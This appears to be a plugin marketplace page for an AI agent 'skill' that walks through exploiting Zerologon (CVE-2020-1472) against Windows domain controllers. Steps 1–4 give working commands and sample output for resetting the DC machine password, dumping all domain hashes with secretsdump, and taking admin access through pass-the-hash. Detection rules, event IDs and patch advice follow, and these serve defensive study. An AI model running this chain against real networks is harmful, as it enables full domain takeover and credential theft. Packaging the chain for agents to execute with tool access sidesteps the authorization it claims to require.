Skill

exploiting-zerologon-vulnerability-cve-2020-1472

Exploits Zerologon (CVE-2020-1472) in Netlogon to reset domain controller machine account password for compromise. For authorized red teaming and pentesting unpatched Windows DCs.

Python

security

npx claudepluginhub mukul975/anthropic-cybersecurity-skills --plugin cybersecurity-skills

Tool Access

This skill uses the workspace's default tool permissions.

Preview

Zerologon (CVE-2020-1472) is a critical elevation of privilege vulnerability (CVSS 10.0) in the Microsoft Netlogon Remote Protocol (MS-NRPC). The flaw exists in the cryptographic implementation of AES-CFB8 mode, where the initialization vector (IV) is incorrectly set to all zeros. This allows an unauthenticated attacker with network access to a domain controller to establish a Netlogon session ...

Supporting Assets

LICENSEassets/template.mdreferences/api-reference.mdreferences/standards.mdreferences/workflows.mdscripts/agent.pyscripts/process.py

SKILL.md

Similar Skills

applying-brand-guidelines

41.6k

Applies Acme Corporation brand guidelines including colors, fonts, layouts, and messaging to generated PowerPoint, Excel, and PDF documents.

3 files

anthropics-claude-cookbooks

creating-financial-models

41.6k

Builds DCF models with sensitivity analysis, Monte Carlo simulations, and scenario planning for investment valuation and risk assessment.

2 files

anthropics-claude-cookbooks

analyzing-financial-statements

41.6k

Calculates profitability (ROE, margins), liquidity (current ratio), leverage, efficiency, and valuation (P/E, EV/EBITDA) ratios from financial statements in CSV, JSON, text, or Excel for investment analysis.

2 files

anthropics-claude-cookbooks

Stats

Stars5748

Forks783

Last CommitApr 6, 2026

Actions

View Source View Plugin View on GitHub View README

Exploiting Zerologon Vulnerability (CVE-2020-1472)

Overview

When to Use

When performing authorized security testing that involves exploiting zerologon vulnerability cve 2020 1472
When analyzing malware samples or attack artifacts in a controlled environment
When conducting red team exercises or penetration testing engagements
When building detection capabilities based on offensive technique understanding

Prerequisites

Network access to a Domain Controller (TCP port 135 and dynamic RPC ports)
No authentication required (unauthenticated exploit)
Target DC must not have the February 2021 enforcement mode enabled
Impacket toolkit installed
Written authorization for red team engagement

Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.

MITRE ATT&CK Mapping

Technique ID	Name	Tactic
T1068	Exploitation for Privilege Escalation	Privilege Escalation
T1210	Exploitation of Remote Services	Lateral Movement
T1003.006	OS Credential Dumping: DCSync	Credential Access
T1078.002	Valid Accounts: Domain Accounts	Persistence

Vulnerability Technical Details

Root Cause

The Netlogon authentication protocol uses AES-CFB8 encryption with a client challenge and server challenge. The vulnerability exists because:

The IV is hardcoded to 16 bytes of zeros
When the plaintext is 8 bytes of zeros, AES-CFB8 produces a ciphertext of all zeros with probability 1 in 256
An attacker can send approximately 256 authentication attempts (takes ~3 seconds) to succeed

Affected Systems

Windows Server 2008 R2 through Windows Server 2019
All domain controllers running unpatched Netlogon service
Samba versions < 4.8 (if running as AD DC)

Step 1: Identify Vulnerable Domain Controllers

# Scan for domain controllers
nmap -p 135,139,389,445 -sV --script=ms-sql-info,smb-os-discovery 10.10.10.0/24

# Check if DC is vulnerable using zerologon checker
python3 zerologon_tester.py DC01 10.10.10.1

# Using CrackMapExec
crackmapexec smb 10.10.10.1 -M zerologon

Step 2: Exploit Zerologon

# Using Impacket's CVE-2020-1472 exploit
# This sets the DC machine account password to empty
python3 cve_2020_1472.py DC01$ 10.10.10.1

# Expected output:
# Performing authentication attempts...
# =========================================
# NetrServerAuthenticate2 Result: 0 (success after ~256 attempts)
# NetrServerPasswordSet2 call was successful
# DC01$ machine account password set to empty string

Step 3: DCSync with Empty Password

# Use the empty hash to perform DCSync
secretsdump.py -no-pass -just-dc corp.local/DC01\$@10.10.10.1

# Output includes all domain hashes:
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
# krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f3bc61e97fb14d18c42bcbf6c3a9055f:::
# svc_sql:1103:aad3b435b51404eeaad3b435b51404ee:e4cba78b4c01d6e5c0e31ffff18e46ab:::

# Alternatively, dump specific accounts
secretsdump.py -no-pass corp.local/DC01\$@10.10.10.1 \
  -just-dc-user Administrator

Step 4: Obtain Domain Admin Access

# Pass the Hash with Administrator NTLM
psexec.py -hashes :32ed87bdb5fdc5e9cba88547376818d4 \
  corp.local/Administrator@10.10.10.1

# Or use wmiexec for stealthier access
wmiexec.py -hashes :32ed87bdb5fdc5e9cba88547376818d4 \
  corp.local/Administrator@10.10.10.1

Step 5: Restore Machine Account Password (CRITICAL)

WARNING: After exploiting Zerologon, the DC machine account password is empty, which will break Active Directory replication and services. You MUST restore it.

# Method 1: Use the exploit's restore functionality
python3 restorepassword.py corp.local/DC01@DC01 -target-ip 10.10.10.1 \
  -hexpass <original_hex_password>

# Method 2: Force machine account password change from DC
# Connect to DC as Administrator and run:
netdom resetpwd /server:DC01 /userd:CORP\Administrator /passwordd:*

# Method 3: Restart the DC (it will auto-regenerate machine password)
# This is the safest method but causes downtime

Detection

Windows Event Logs

Event ID 4742: A computer account was changed
- Look for: DC$ account with password change
- Anomaly: Multiple 4742 events for DC$ in short period

Event ID 5805: Netlogon authentication failure
- Multiple failures followed by success = Zerologon attempt

Event ID 4624 (Type 3): Network logon
- DC$ account logging in from unexpected IP

Network Detection

# Suricata rule for Zerologon
alert dcerpc any any -> any any (
  msg:"ET EXPLOIT Possible Zerologon NetrServerReqChallenge";
  flow:established,to_server;
  dce_opnum:4;
  content:"|00 00 00 00 00 00 00 00|";
  sid:2030870;
  rev:1;
)

Sigma Rule

title: Zerologon Exploitation Attempt
status: stable
logsource:
    product: windows
    service: system
detection:
    selection:
        EventID: 5805
        LogonType: 3
    timeframe: 5m
    condition: selection | count(EventID) > 100
level: critical
tags:
    - attack.privilege_escalation
    - attack.t1068
    - cve.2020.1472

Defensive Recommendations

Apply patches immediately - KB4571694 (August 2020) and enforce February 2021 mode
Enable enforcement mode via registry: FullSecureChannelProtection = 1
Monitor Event ID 5805 for repeated Netlogon failures
Deploy Microsoft Defender for Identity (detects Zerologon automatically)
Network segmentation - Restrict direct access to DCs from user networks
Block Netlogon RPC from non-DC systems where possible

References

CVE-2020-1472: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472
Secura Whitepaper: https://www.secura.com/blog/zero-logon
CrowdStrike Advisory: https://www.crowdstrike.com/blog/cve-2020-1472-zerologon-security-advisory/
CISA Alert AA20-283A: https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-283a
Microsoft Enforcement: https://support.microsoft.com/en-us/topic/how-to-manage-the-changes-in-netlogon-secure-channel-connections-associated-with-cve-2020-1472-f7e8cc17-0309-1d6a-304e-5ba73f3a1f24